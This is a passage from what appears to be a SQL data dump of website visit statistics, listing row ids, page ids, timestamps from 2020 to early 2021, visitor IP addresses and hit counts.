19:17:14','184.154.139.20',2),(5525,6,'2020-04-30 16:16:59','207.46.13.71',7),(5526,10,'2020-04-30 22:38:26','207.46.13.218',3),(5527,7,'2020-05-01 03:32:50','71.163.49.143',2),(5528,6,'2020-05-01 18:05:01','167.114.92.56',6),(5529,7,'2020-05-02 13:46:09','157.55.39.93',1),(5530,6,'2020-05-02 18:31:42','2.56.139.8',11),(5531,10,'2020-05-02 19:06:17','184.154.139.3',6),(5532,10,'2020-05-03 20:02:22','107.77.203.56',9),(5533,7,'2020-05-04 01:00:44','157.55.39.93',5),(5534,6,'2020-05-04 13:15:15','51.89.232.57',16),(5535,10,'2020-05-05 00:22:22','52.201.182.91',4),(5536,7,'2020-05-05 10:16:57','157.55.39.93',1),(5537,6,'2020-05-05 20:04:23','193.70.13.18',2),(5538,10,'2020-05-06 16:56:26','50.206.158.166',5),(5539,7,'2020-05-06 16:57:40','50.206.158.166',1),(5540,6,'2020-05-07 04:19:32','79.126.107.140',6),(5541,10,'2020-05-07 19:11:33','184.154.139.18',2),(5542,7,'2020-05-07 20:34:41','207.46.13.128',3),(5543,6,'2020-05-08 10:13:22','185.220.101.235',7),(5544,6,'2020-05-09 16:23:24','23.129.64.210',7),(5545,7,'2020-05-09 19:24:38','167.114.65.240',2),(5546,10,'2020-05-09 19:24:44','167.114.65.240',3),(5547,6,'2020-05-10 18:29:13','185.220.101.239',7),(5548,7,'2020-05-11 08:41:31','104.239.0.9',1),(5549,6,'2020-05-11 18:29:42','213.166.70.96',11),(5550,10,'2020-05-11 20:28:46','97.93.48.132',4),(5551,7,'2020-05-12 09:47:03','207.46.13.75',4),(5552,6,'2020-05-12 19:05:21','184.154.139.18',8),(5553,10,'2020-05-12 20:41:09','78.46.69.46',4),(5554,7,'2020-05-13 10:18:33','66.249.75.200',3),(5555,6,'2020-05-13 19:18:52','13.52.212.111',15),(5556,10,'2020-05-14 19:09:40','184.154.139.17',5),(5557,6,'2020-05-15 02:03:40','217.146.13.87',15),(5558,7,'2020-05-15 03:45:31','184.168.193.177',2),(5559,10,'2020-05-16 01:44:27','157.55.39.201',2),(5560,6,'2020-05-16 02:44:12','66.249.75.204',9),(5561,7,'2020-05-16 06:53:01','66.249.75.200',1),(5562,7,'2020-05-17 10:03:26','66.249.75.200',5),(5563,10,'2020-05-17 19:02:16','184.154.139.19',7),(5564,6,'2020-05-18 05:46:58','47.74.186.195',8),(5565,7,'2020-05-18 14:59:05','157.55.39.252',5),(5566,10,'2020-05-18 19:06:16','184.154.139.17',6),(5567,6,'2020-05-19 07:03:39','5.189.133.231',11),(5568,7,'2020-05-19 19:05:06','184.154.139.20',2),(5569,6,'2020-05-20 09:20:26','46.98.128.48',11),(5570,10,'2020-05-20 19:12:01','184.154.139.3',4),(5571,6,'2020-05-21 10:27:25','66.249.75.202',7),(5572,6,'2020-05-22 10:35:49','51.158.68.68',6),(5573,10,'2020-05-22 16:40:03','40.77.167.26',5),(5574,7,'2020-05-22 17:02:50','45.56.154.239',2),(5575,6,'2020-05-23 18:25:28','164.68.116.198',13),(5576,10,'2020-05-23 19:02:49','184.154.139.18',3),(5577,7,'2020-05-24 18:27:34','158.222.8.74',4),(5578,10,'2020-05-24 19:08:13','184.154.139.21',3),(5579,6,'2020-05-24 21:11:51','161.117.10.233',14),(5580,10,'2020-05-25 19:10:40','184.154.139.20',3),(5581,7,'2020-05-25 20:35:50','173.0.94.255',2),(5582,6,'2020-05-25 22:41:18','17.58.96.99',11),(5583,6,'2020-05-27 01:02:21','111.250.143.56',15),(5584,7,'2020-05-27 06:30:04','104.239.6.83',3),(5585,10,'2020-05-27 06:32:14','104.239.6.132',5),(5586,6,'2020-05-28 01:03:31','185.191.215.99',9),(5587,7,'2020-05-28 16:35:41','104.239.4.70',2),(5588,10,'2020-05-28 23:18:57','107.183.168.177',3),(5589,6,'2020-05-29 04:03:59','2.95.85.234',13),(5590,6,'2020-05-30 04:44:38','185.121.69.14',11),(5591,10,'2020-05-30 17:42:49','24.147.105.99',2),(5592,6,'2020-05-31 09:30:25','185.24.117.42',10),(5593,7,'2020-06-01 13:28:05','157.55.39.187',2),(5594,6,'2020-06-01 15:14:54','2.95.201.156',10),(5595,10,'2020-06-01 19:02:17','184.154.139.20',3),(5596,10,'2020-06-02 19:12:34','184.154.139.21',4),(5597,6,'2020-06-02 19:40:13','173.0.94.255',12),(5598,7,'2020-06-03 14:36:56','206.41.175.219',3),(5599,6,'2020-06-03 20:56:57','164.68.116.198',12),(5600,10,'2020-06-04 05:22:25','69.165.11.196',3),(5601,7,'2020-06-04 16:14:52','38.96.28.141',2),(5602,6,'2020-06-05 04:35:06','85.26.233.237',10),(5603,10,'2020-06-05 19:10:02','184.154.139.18',2),(5604,6,'2020-06-06 06:01:09','37.79.19.77',6),(5605,7,'2020-06-06 17:08:42','207.46.13.63',2),(5606,6,'2020-06-07 06:19:43','89.151.169.190',13),(5607,10,'2020-06-07 07:28:00','144.217.73.217',2),(5608,6,'2020-06-08 07:09:55','161.117.9.99',10),(5609,10,'2020-06-08 12:53:07','207.46.13.252',3),(5610,7,'2020-06-08 19:06:19','184.154.139.21',3),(5611,6,'2020-06-09 07:36:06','5.248.226.19',22),(5612,10,'2020-06-09 13:57:32','199.188.118.54',4),(5613,6,'2020-06-10 10:53:12','47.244.13.202',7),(5614,7,'2020-06-10 11:15:40','40.77.167.16',1),(5615,10,'2020-06-10 19:07:32','184.154.139.3',1),(5616,6,'2020-06-11 15:24:59','83.221.222.94',13),(5617,10,'2020-06-11 19:13:08','184.154.139.3',3),(5618,7,'2020-06-11 21:28:38','40.77.167.16',6),(5619,6,'2020-06-12 19:10:05','92.47.67.225',14),(5620,10,'2020-06-13 00:33:59','17.58.96.99',3),(5621,7,'2020-06-13 23:26:56','17.58.96.99',3),(5622,6,'2020-06-14 04:06:10','145.239.121.218',13),(5623,10,'2020-06-14 19:05:45','184.154.139.21',4),(5624,7,'2020-06-15 02:51:01','104.236.118.204',4),(5625,6,'2020-06-15 15:57:52','178.159.37.88',13),(5626,10,'2020-06-15 23:10:25','138.197.13.155',3),(5627,6,'2020-06-16 15:59:37','51.195.166.210',9),(5628,7,'2020-06-17 00:47:58','114.119.162.252',5),(5629,10,'2020-06-17 09:44:31','62.138.16.192',5),(5630,6,'2020-06-17 16:20:18','108.31.203.42',12),(5631,6,'2020-06-18 16:58:04','173.252.107.21',4),(5632,10,'2020-06-18 19:09:04','184.154.139.19',4),(5633,7,'2020-06-18 22:48:21','54.67.57.255',3),(5634,10,'2020-06-19 19:24:03','107.172.56.220',3),(5635,7,'2020-06-19 23:22:27','66.249.75.204',2),(5636,6,'2020-06-20 01:02:55','179.43.176.201',10),(5637,10,'2020-06-20 19:25:12','23.89.247.112',3),(5638,6,'2020-06-21 01:52:33','188.172.220.71',5),(5639,7,'2020-06-21 10:14:05','66.249.75.200',2),(5640,6,'2020-06-22 03:56:44','185.220.101.205',13),(5641,10,'2020-06-22 16:15:14','159.69.189.219',3),(5642,7,'2020-06-22 16:15:39','159.69.189.219',4),(5643,6,'2020-06-23 04:13:27','185.232.53.10',15),(5644,10,'2020-06-23 18:44:52','37.46.133.129',6),(5645,7,'2020-06-24 01:16:54','107.173.68.67',3),(5646,6,'2020-06-24 04:35:56','51.158.119.88',18),(5647,10,'2020-06-25 04:29:41','114.119.162.252',1),(5648,6,'2020-06-25 05:40:49','94.172.126.184',4),(5649,7,'2020-06-25 10:49:41','114.119.167.159',2),(5650,6,'2020-06-26 08:47:12','92.38.136.69',9),(5651,6,'2020-06-27 13:04:01','185.234.216.180',9),(5652,7,'2020-06-27 19:05:26','184.154.139.21',2),(5653,10,'2020-06-28 11:16:38','107.172.229.157',4),(5654,6,'2020-06-28 13:25:18','13.66.139.0',5),(5655,7,'2020-06-28 20:30:10','114.119.161.39',2),(5656,6,'2020-06-29 14:56:12','91.205.168.46',8),(5657,10,'2020-06-30 02:33:39','24.209.25.139',2),(5658,6,'2020-06-30 18:43:30','5.188.84.6',5),(5659,7,'2020-06-30 19:02:31','184.154.139.3',2),(5660,6,'2020-07-01 19:08:18','184.154.139.21',16),(5661,7,'2020-07-02 06:40:47','17.58.102.51',1),(5662,6,'2020-07-02 19:13:51','184.154.139.18',11),(5663,10,'2020-07-03 12:21:19','71.163.250.174',3),(5664,6,'2020-07-03 19:25:00','62.210.79.40',11),(5665,10,'2020-07-04 19:04:28','184.154.139.17',6),(5666,7,'2020-07-04 21:54:20','157.55.39.42',5),(5667,6,'2020-07-05 03:46:30','179.43.174.226',9),(5668,10,'2020-07-05 19:12:04','184.154.139.17',3),(5669,6,'2020-07-06 08:01:12','78.29.118.59',12),(5670,7,'2020-07-06 11:20:50','104.227.97.122',2),(5671,10,'2020-07-07 05:45:49','207.46.13.35',5),(5672,6,'2020-07-07 12:42:20','51.158.119.88',11),(5673,7,'2020-07-07 19:06:55','184.154.139.17',3),(5674,10,'2020-07-08 07:15:03','207.46.13.35',5),(5675,6,'2020-07-08 13:16:03','62.210.79.40',2),(5676,7,'2020-07-08 19:10:52','184.154.139.17',19),(5677,6,'2020-07-09 13:48:16','151.106.54.34',10),(5678,10,'2020-07-09 17:41:08','66.70.178.119',7),(5679,7,'2020-07-09 20:16:02','35.203.181.10',17),(5680,6,'2020-07-10 14:09:32','85.26.233.74',11),(5681,10,'2020-07-10 19:07:23','184.154.139.18',2),(5682,7,'2020-07-11 11:37:04','173.252.87.14',4),(5683,6,'2020-07-11 14:26:10','107.174.245.230',11),(5684,10,'2020-07-12 04:29:26','104.227.97.122',2),(5685,6,'2020-07-12 19:08:10','184.154.139.3',15),(5686,7,'2020-07-12 20:08:47','38.128.157.71',3),(5687,10,'2020-07-13 07:30:12','158.69.26.144',5),(5688,6,'2020-07-13 21:54:40','185.136.159.30',15),(5689,7,'2020-07-13 22:37:29','173.69.150.59',10),(5690,10,'2020-07-14 08:38:43','207.46.13.210',1),(5691,7,'2020-07-15 01:06:59','108.3.166.46',4),(5692,6,'2020-07-15 04:12:49','104.200.35.97',12),(5693,10,'2020-07-15 09:52:27','207.46.13.210',2),(5694,7,'2020-07-16 03:36:52','66.249.65.144',4),(5695,6,'2020-07-16 09:38:07','128.71.38.228',15),(5696,10,'2020-07-16 23:34:14','73.172.13.252',4),(5697,6,'2020-07-17 11:29:06','173.213.85.7',8),(5698,7,'2020-07-18 08:57:24','172.58.187.91',3),(5699,10,'2020-07-18 10:12:34','157.55.39.194',1),(5700,6,'2020-07-18 13:51:29','157.55.39.194',7),(5701,6,'2020-07-19 15:31:06','212.164.65.224',8),(5702,7,'2020-07-19 23:05:57','198.23.238.13',6),(5703,10,'2020-07-19 23:06:33','198.23.238.13',7),(5704,6,'2020-07-20 16:49:24','144.76.72.104',10),(5705,7,'2020-07-21 00:24:11','17.58.102.51',2),(5706,10,'2020-07-21 15:19:54','40.77.167.75',3),(5707,6,'2020-07-21 19:02:40','184.154.139.21',8),(5708,7,'2020-07-22 19:07:22','184.154.139.18',12),(5709,6,'2020-07-22 19:07:32','184.154.139.18',15),(5710,10,'2020-07-22 20:50:30','114.119.167.159',6),(5711,6,'2020-07-23 21:28:48','52.201.182.91',10),(5712,10,'2020-07-23 21:28:52','3.94.137.21',6),(5713,7,'2020-07-23 21:28:53','52.201.182.91',13),(5714,6,'2020-07-24 21:43:48','114.119.161.39',8),(5715,10,'2020-07-25 00:23:10','69.138.30.169',4),(5716,7,'2020-07-25 01:04:53','157.245.242.128',3),(5717,6,'2020-07-26 01:17:09','128.71.235.249',8),(5718,10,'2020-07-26 05:02:44','114.119.160.176',10),(5719,7,'2020-07-26 06:52:52','40.77.167.164',3),(5720,6,'2020-07-27 01:50:03','213.178.60.128',5),(5721,7,'2020-07-27 09:24:40','173.252.79.6',7),(5722,10,'2020-07-27 19:02:57','184.154.139.17',6),(5723,6,'2020-07-28 02:36:30','45.55.255.88',13),(5724,7,'2020-07-28 17:05:22','104.227.97.122',3),(5725,10,'2020-07-28 19:11:17','184.154.139.20',5),(5726,6,'2020-07-29 03:30:27','62.149.29.51',10),(5727,7,'2020-07-29 18:53:04','18.204.58.248',6),(5728,10,'2020-07-29 22:11:46','100.16.184.106',4),(5729,6,'2020-07-30 05:16:45','66.249.65.142',14),(5730,7,'2020-07-31 02:50:04','114.119.162.150',5),(5731,10,'2020-07-31 04:47:43','35.205.39.12',7),(5732,6,'2020-07-31 07:42:07','5.188.84.207',5),(5733,6,'2020-08-01 08:12:57','178.172.147.237',9),(5734,10,'2020-08-01 09:21:06','114.119.164.13',6),(5735,7,'2020-08-01 23:50:28','159.65.37.130',4),(5736,6,'2020-08-02 08:34:32','23.94.17.223',12),(5737,10,'2020-08-02 19:12:00','184.154.139.18',8),(5738,7,'2020-08-03 04:57:02','54.219.58.180',5),(5739,6,'2020-08-03 11:19:25','46.187.61.144',9),(5740,10,'2020-08-03 23:00:16','51.222.43.122',6),(5741,7,'2020-08-04 09:50:06','114.119.160.176',6),(5742,6,'2020-08-04 16:57:52','69.60.33.112',16),(5743,10,'2020-08-04 23:58:21','52.201.182.91',7),(5744,7,'2020-08-05 15:29:12','71.178.208.210',6),(5745,6,'2020-08-06 04:12:24','94.242.62.37',13),(5746,10,'2020-08-06 09:54:43','114.119.160.176',5),(5747,7,'2020-08-06 17:20:15','209.99.161.246',4),(5748,6,'2020-08-07 04:17:05','66.249.65.142',9),(5749,10,'2020-08-07 11:07:53','114.119.162.92',6),(5750,7,'2020-08-07 18:57:26','181.214.121.177',4),(5751,6,'2020-08-08 04:20:26','46.161.62.245',9),(5752,10,'2020-08-08 14:49:05','100.16.184.106',8),(5753,7,'2020-08-08 22:21:46','73.173.98.249',2),(5754,10,'2020-08-09 16:50:44','40.77.167.21',5),(5755,7,'2020-08-10 11:11:05','66.249.65.144',6),(5756,10,'2020-08-10 19:48:58','23.254.36.107',4),(5757,7,'2020-08-11 16:43:10','23.95.97.238',6),(5758,10,'2020-08-11 20:00:04','100.16.184.106',7),(5759,10,'2020-08-12 20:36:17','114.119.162.150',6),(5760,7,'2020-08-13 10:53:39','104.227.97.122',3),(5761,10,'2020-08-13 21:38:24','172.58.187.147',17),(5762,7,'2020-08-14 18:28:17','31.13.115.13',24),(5763,10,'2020-08-14 22:36:39','173.67.0.103',12),(5764,7,'2020-08-15 19:58:38','173.252.87.118',8),(5765,10,'2020-08-16 02:46:31','3.94.137.21',8),(5766,7,'2020-08-17 03:56:01','114.119.164.13',13),(5767,10,'2020-08-17 12:11:36','172.58.190.199',9),(5768,7,'2020-08-18 04:47:29','114.119.160.176',13),(5769,10,'2020-08-18 12:22:56','69.165.11.83',9),(5770,7,'2020-08-19 11:29:14','173.252.87.10',15),(5771,10,'2020-08-19 13:06:31','114.119.164.126',11),(5772,10,'2020-08-20 15:42:22','17.58.102.51',8),(5773,7,'2020-08-20 19:31:50','114.119.162.150',14),(5774,10,'2020-08-21 19:02:57','184.154.139.3',8),(5775,7,'2020-08-21 21:49:56','172.241.142.178',17),(5776,10,'2020-08-22 19:05:04','184.154.139.18',4),(5777,7,'2020-08-22 22:22:06','31.13.127.111',23),(5778,10,'2020-08-23 19:21:42','12.172.237.132',10),(5779,7,'2020-08-23 23:27:40','114.119.164.13',4),(5780,10,'2020-08-24 21:42:37','100.16.184.106',5),(5781,7,'2020-08-25 00:14:28','114.119.167.159',2),(5782,10,'2020-08-25 21:46:15','172.58.190.240',7),(5783,7,'2020-08-26 00:28:32','52.201.182.91',14),(5784,7,'2020-08-27 08:25:49','66.249.65.86',9),(5785,10,'2020-08-27 17:25:18','5.188.84.245',9),(5786,10,'2020-08-28 19:12:12','184.154.139.21',9),(5787,7,'2020-08-28 22:38:15','173.252.87.16',16),(5788,10,'2020-08-29 21:20:03','100.16.184.106',11),(5789,7,'2020-08-29 23:58:41','173.252.79.111',18),(5790,7,'2020-08-31 02:29:22','99.76.149.87',7),(5791,10,'2020-08-31 07:49:15','114.119.167.159',4),(5792,7,'2020-09-01 03:12:17','64.140.135.215',6),(5793,10,'2020-09-01 10:21:05','114.119.143.145',12),(5794,10,'2020-09-02 10:44:26','100.16.184.106',3),(5795,7,'2020-09-02 12:32:53','104.227.97.122',5),(5796,10,'2020-09-03 12:59:52','172.58.188.199',8),(5797,7,'2020-09-03 14:33:01','31.13.115.16',6),(5798,10,'2020-09-04 17:46:43','172.58.188.160',7),(5799,7,'2020-09-04 18:26:59','209.149.216.2',3),(5800,7,'2020-09-05 19:03:15','184.154.139.19',1),(5801,10,'2020-09-05 19:03:49','184.154.139.19',4),(5802,10,'2020-09-06 19:09:27','184.154.139.17',3),(5803,7,'2020-09-07 02:40:50','114.119.145.125',4),(5804,10,'2020-09-08 08:05:41','114.119.141.146',10),(5805,7,'2020-09-08 08:11:09','114.119.143.145',8),(5806,7,'2020-09-09 09:09:13','114.119.136.66',5),(5807,10,'2020-09-09 09:26:36','114.119.136.66',10),(5808,7,'2020-09-10 09:25:03','66.249.65.87',9),(5809,10,'2020-09-10 17:55:46','207.46.13.252',13),(5810,7,'2020-09-11 17:24:31','66.220.149.20',4),(5811,10,'2020-09-11 18:55:54','73.128.236.239',9),(5812,7,'2020-09-12 17:44:36','96.241.18.151',6),(5813,10,'2020-09-12 19:12:54','184.154.139.21',3),(5814,10,'2020-09-13 22:56:37','174.244.195.91',6),(5815,7,'2020-09-13 23:35:45','114.119.143.145',2),(5816,10,'2020-09-14 23:19:16','114.119.143.145',7),(5817,7,'2020-09-15 00:06:37','66.220.149.21',9),(5818,7,'2020-09-16 00:36:54','68.33.109.113',7),(5819,10,'2020-09-16 06:20:46','38.93.172.191',5),(5820,10,'2020-09-17 08:51:54','114.119.145.125',7),(5821,7,'2020-09-17 11:20:17','114.119.134.41',9),(5822,7,'2020-09-18 12:49:27','157.55.39.180',6),(5823,10,'2020-09-18 14:58:39','40.77.167.238',5),(5824,7,'2020-09-19 13:21:50','64.150.247.138',7),(5825,10,'2020-09-19 15:37:27','173.79.30.20',9),(5826,7,'2020-09-20 13:48:35','114.119.143.145',4),(5827,10,'2020-09-20 19:02:12','184.154.139.17',2),(5828,7,'2020-09-21 15:06:15','114.119.141.146',7),(5829,10,'2020-09-21 19:09:00','184.154.139.20',7),(5830,7,'2020-09-22 19:05:17','184.154.139.20',6),(5831,10,'2020-09-22 20:42:23','173.79.42.215',9),(5832,10,'2020-09-23 20:48:24','77.88.5.67',5),(5833,7,'2020-09-24 18:04:11','172.72.134.77',11),(5834,10,'2020-09-25 03:48:41','100.15.114.198',6),(5835,7,'2020-09-26 08:22:11','173.252.95.10',8),(5836,10,'2020-09-26 14:37:45','141.156.239.78',3),(5837,7,'2020-09-27 11:34:18','38.135.200.103',4),(5838,10,'2020-09-27 16:33:58','17.58.102.54',5),(5839,7,'2020-09-28 15:30:47','114.119.130.104',8),(5840,10,'2020-09-28 19:01:42','184.154.139.20',9),(5841,10,'2020-09-29 19:09:29','184.154.139.17',6),(5842,7,'2020-09-29 23:09:46','73.1.13.113',8),(5843,10,'2020-09-30 19:10:36','184.154.139.21',5),(5844,7,'2020-10-01 05:44:16','66.249.65.85',7),(5845,10,'2020-10-01 19:42:26','191.101.122.60',5),(5846,7,'2020-10-02 19:33:08','114.119.158.13',4),(5847,10,'2020-10-03 00:17:19','157.55.39.78',4),(5848,10,'2020-10-04 00:46:35','40.77.190.126',5),(5849,7,'2020-10-04 04:17:31','104.227.97.122',5),(5850,10,'2020-10-05 01:55:41','71.114.10.139',7),(5851,7,'2020-10-05 04:19:47','114.119.151.107',6),(5852,7,'2020-10-06 08:25:42','174.192.202.147',5),(5853,10,'2020-10-06 11:25:15','114.119.145.125',5),(5854,7,'2020-10-07 09:34:05','114.119.136.66',8),(5855,10,'2020-10-07 12:09:12','52.201.182.91',6),(5856,10,'2020-10-08 19:14:43','184.154.139.21',6),(5857,7,'2020-10-08 19:48:07','76.106.70.160',8),(5858,7,'2020-10-09 23:41:37','73.194.64.105',1),(5859,10,'2020-10-10 19:09:28','184.154.139.21',6),(5860,7,'2020-10-11 10:25:39','95.216.172.173',5),(5861,10,'2020-10-11 20:24:22','114.119.148.105',3),(5862,7,'2020-10-12 22:01:14','66.249.69.142',9),(5863,10,'2020-10-12 22:54:51','149.100.187.183',9),(5864,10,'2020-10-13 23:02:56','114.119.130.104',14),(5865,7,'2020-10-14 07:58:40','114.119.157.110',10),(5866,10,'2020-10-15 01:43:19','185.143.231.222',6),(5867,7,'2020-10-15 08:42:59','66.249.65.183',6),(5868,7,'2020-10-16 09:57:07','66.249.65.179',7),(5869,10,'2020-10-16 19:05:04','184.154.139.18',7),(5870,7,'2020-10-17 10:31:11','66.249.65.180',18),(5871,10,'2020-10-17 19:09:55','184.154.139.3',12),(5872,7,'2020-10-18 13:02:11','66.249.65.181',5),(5873,10,'2020-10-18 19:13:11','184.154.139.19',8),(5874,7,'2020-10-19 22:16:48','114.119.141.146',10),(5875,10,'2020-10-19 23:59:09','209.99.162.29',11),(5876,10,'2020-10-21 08:14:42','114.119.157.110',5),(5877,7,'2020-10-21 11:24:48','114.119.143.145',9),(5878,10,'2020-10-22 12:08:58','114.119.157.110',6),(5879,7,'2020-10-22 17:44:03','73.135.39.45',4),(5880,10,'2020-10-23 19:15:43','184.154.139.21',2),(5881,7,'2020-10-23 19:18:17','71.196.58.69',5),(5882,7,'2020-10-24 19:29:05','139.180.1.125',4),(5883,10,'2020-10-24 19:29:45','139.180.1.125',2),(5884,7,'2020-10-25 19:52:20','154.12.163.157',4),(5885,10,'2020-10-25 19:52:53','154.12.163.157',7),(5886,10,'2020-10-26 20:51:27','157.55.39.166',5),(5887,7,'2020-10-27 02:05:27','24.207.159.253',9),(5888,10,'2020-10-28 00:59:58','82.202.173.76',13),(5889,7,'2020-10-28 04:27:45','17.58.102.56',4),(5890,10,'2020-10-29 04:14:45','205.186.165.174',3),(5891,7,'2020-10-29 10:22:24','66.249.65.183',7),(5892,7,'2020-10-30 17:59:59','68.33.171.98',4),(5893,10,'2020-10-30 18:00:16','68.33.171.98',2),(5894,10,'2020-10-31 22:55:06','185.143.231.178',6),(5895,7,'2020-11-01 05:12:54','76.29.127.65',5),(5896,7,'2020-11-02 11:22:20','114.119.158.13',3),(5897,10,'2020-11-02 19:02:00','64.124.152.34',3),(5898,7,'2020-11-03 16:44:05','69.160.160.51',5),(5899,10,'2020-11-03 20:08:17','184.154.139.19',6),(5900,7,'2020-11-04 18:46:47','73.135.39.45',3),(5901,10,'2020-11-04 20:11:25','184.154.139.18',6),(5902,10,'2020-11-05 22:17:11','66.249.65.178',6),(5903,7,'2020-11-05 22:41:31','96.249.157.68',2),(5904,7,'2020-11-06 22:43:49','24.125.35.43',5),(5905,10,'2020-11-07 21:08:35','157.55.39.63',4),(5906,7,'2020-11-08 02:13:10','144.76.72.99',18),(5907,10,'2020-11-08 22:30:20','100.16.232.206',10),(5908,7,'2020-11-09 17:14:27','209.99.161.66',7),(5909,10,'2020-11-10 03:43:25','209.99.160.19',4),(5910,7,'2020-11-11 01:43:07','96.19.131.246',4),(5911,10,'2020-11-11 12:58:42','52.201.182.91',7),(5912,7,'2020-11-12 02:12:31','104.227.97.122',9),(5913,10,'2020-11-12 21:23:27','207.46.13.70',4),(5914,7,'2020-11-13 08:06:45','38.96.28.165',7),(5915,10,'2020-11-14 06:34:14','138.94.218.121',3),(5916,7,'2020-11-14 14:14:02','71.63.26.166',15),(5917,7,'2020-11-16 03:16:53','173.252.83.22',10),(5918,10,'2020-11-16 05:43:32','66.249.75.214',2),(5919,7,'2020-11-17 04:47:05','66.249.65.181',7),(5920,10,'2020-11-17 07:37:53','209.99.160.37',10),(5921,7,'2020-11-18 15:28:42','69.137.57.124',3),(5922,10,'2020-11-18 22:39:40','98.182.147.248',3),(5923,7,'2020-11-19 22:56:37','71.196.58.69',4),(5924,10,'2020-11-20 12:43:55','100.16.184.106',5),(5925,7,'2020-11-21 03:44:13','154.12.163.163',3),(5926,10,'2020-11-22 10:52:25','114.119.130.104',13),(5927,7,'2020-11-22 11:02:13','114.119.130.104',6),(5928,7,'2020-11-23 11:57:06','209.99.161.111',4),(5929,10,'2020-11-23 19:01:11','73.135.241.42',7),(5930,7,'2020-11-24 15:20:39','38.93.172.58',5),(5931,10,'2020-11-24 19:50:14','38.128.157.124',2),(5932,7,'2020-11-25 15:21:09','172.58.188.87',11),(5933,10,'2020-11-26 01:48:33','173.44.223.39',2),(5934,7,'2020-11-26 23:51:20','209.99.161.243',6),(5935,10,'2020-11-27 04:31:03','138.197.111.12',3),(5936,7,'2020-11-28 03:25:59','66.249.65.177',4),(5937,10,'2020-11-28 07:00:12','17.58.102.65',6),(5938,7,'2020-11-29 03:54:18','66.249.65.181',14),(5939,10,'2020-11-29 16:12:32','100.16.232.206',5),(5940,10,'2020-11-30 16:46:53','66.249.65.178',8),(5941,7,'2020-11-30 17:02:12','66.249.65.181',3),(5942,10,'2020-12-01 20:03:25','184.154.139.17',7),(5943,7,'2020-12-01 22:32:04','66.249.65.183',9),(5944,10,'2020-12-02 22:15:16','40.77.167.32',4),(5945,7,'2020-12-03 02:18:14','68.203.183.143',11),(5946,10,'2020-12-03 22:42:41','40.77.167.32',2),(5947,7,'2020-12-04 10:36:39','66.249.65.183',6),(5948,7,'2020-12-05 12:02:10','172.75.244.33',3),(5949,10,'2020-12-05 20:12:52','38.93.172.10',6),(5950,7,'2020-12-07 03:16:09','114.119.157.110',3),(5951,10,'2020-12-07 14:54:08','38.128.159.37',4),(5952,10,'2020-12-08 20:05:39','184.154.139.19',5),(5953,7,'2020-12-09 02:45:13','66.249.75.210',6),(5954,10,'2020-12-10 06:45:05','64.140.135.200',8),(5955,7,'2020-12-10 12:02:52','35.199.168.81',10),(5956,10,'2020-12-11 08:33:22','141.164.88.242',8),(5957,7,'2020-12-11 12:07:39','173.231.59.198',6),(5958,10,'2020-12-12 11:35:50','173.231.59.198',2),(5959,7,'2020-12-12 20:42:33','35.203.142.209',4),(5960,7,'2020-12-13 22:04:09','38.96.28.247',2),(5961,10,'2020-12-13 22:08:14','64.140.133.73',3),(5962,10,'2020-12-14 23:40:13','64.140.135.173',3),(5963,7,'2020-12-15 00:37:14','149.100.187.214',2),(5964,10,'2020-12-16 00:03:24','73.163.18.138',7),(5965,7,'2020-12-16 04:59:25','3.101.83.192',10),(5966,7,'2020-12-17 08:14:09','66.231.185.72',3),(5967,10,'2020-12-17 08:14:19','66.231.185.72',4),(5968,7,'2020-12-18 22:11:19','114.119.157.110',4),(5969,10,'2020-12-19 00:55:01','64.140.135.32',3),(5970,10,'2020-12-21 17:44:44','68.134.13.180',4),(5971,7,'2020-12-22 01:25:37','38.93.172.140',2),(5972,10,'2020-12-22 20:12:25','184.154.139.20',6),(5973,7,'2020-12-23 13:59:33','52.201.182.91',2),(5974,10,'2020-12-24 06:27:29','76.26.152.227',4),(5975,7,'2020-12-24 19:20:06','45.86.15.154',2),(5976,7,'2020-12-26 06:40:04','17.58.102.76',2),(5977,10,'2020-12-27 06:32:34','209.99.162.157',9),(5978,7,'2020-12-27 07:58:15','173.231.59.195',4),(5979,10,'2020-12-28 11:45:10','13.66.139.163',7),(5980,7,'2020-12-28 14:17:49','38.128.159.44',7),(5981,10,'2020-12-29 20:05:31','184.154.139.19',4),(5982,7,'2020-12-30 12:21:51','34.83.94.241',6),(5983,10,'2020-12-31 02:57:09','64.140.135.230',2),(5984,7,'2020-12-31 19:34:04','35.233.144.154',4),(5985,7,'2021-01-01 22:30:45','66.249.75.213',4),(5986,10,'2021-01-01 22:59:48','207.46.13.155',5),(5987,7,'2021-01-03 12:50:40','173.231.59.195',5),(5988,10,'2021-01-03 13:03:22','173.231.59.195',3),(5989,7,'2021-01-04 14:01:56','209.99.163.68',5),(5990,10,'2021-01-04 14:07:13','64.140.136.85',2),(5991,10,'2021-01-06 02:56:23','68.33.92.254',19),(5992,7,'2021-01-06 04:59:35','172.58.238.186',8),(5993,10,'2021-01-07 03:41:33','207.46.13.146',9),(5994,7,'2021-01-07 11:58:04','93.158.90.96',8),(5995,10,'2021-01-08 07:23:41','38.96.28.135',2),(5996,7,'2021-01-08 20:11:37','184.154.139.21',3),(5997,10,'2021-01-09 17:31:24','17.58.102.76',5),(5998,7,'2021-01-10 00:42:51','114.119.143.145',2),(5999,10,'2021-01-11 02:22:04','51.161.119.104',2),(6000,7,'2021-01-11 02:22:16','51.161.119.104',5),(6001,10,'2021-01-12 04:00:51','207.46.13.146',6),(6002,7,'2021-01-12 08:14:22','209.99.160.225',6),(6003,7,'2021-01-13 12:25:43','66.249.65.83',7),(6004,10,'2021-01-13 12:46:49','82.211.24.30',5),(6005,7,'2021-01-14 18:57:47','172.58.156.239',6),(6006,10,'2021-01-14 20:12:57','184.154.139.20',12),(6007,7,'2021-01-15 21:02:54','66.249.69.83',5),(6008,10,'2021-01-16 15:58:25','107.77.220.232',13),(6009,7,'2021-01-16 22:59:45','204.232.105.200',6),(6010,10,'2021-01-17 16:06:34','68.134.190.72',8),(6011,7,'2021-01-18 20:39:29','172.58.224.54',2),(6012,10,'2021-01-19 14:31:20','24.147.155.141',6),(6013,10,'2021-01-20 14:39:26','52.201.182.91',3),(6014,7,'2021-01-20 14:39:28','52.201.182.91',5),(6015,10,'2021-01-21 20:04:30','184.154.139.3',5),(6016,7,'2021-01-22 17:28:30','209.99.161.31',4),(6017,10,'2021-01-23 14:39:16','51.68.11.195',4),(6018,7,'2021-01-23 19:55:31','173.231.59.201',3),(6019,10,'2021-01-24 17:29:05','114.236.155.147',5),(6020,7,'2021-01-25 09:31:59','173.252.111.118',8),(6021,10,'2021-01-25 23:10:26','64.140.134.159',7),(6022,7,'2021-01-26 18:18:36','64.140.133.141',5),(6023,10,'2021-01-27 00:00:56','223.136.24.32',8),(6024,10,'2021-01-28 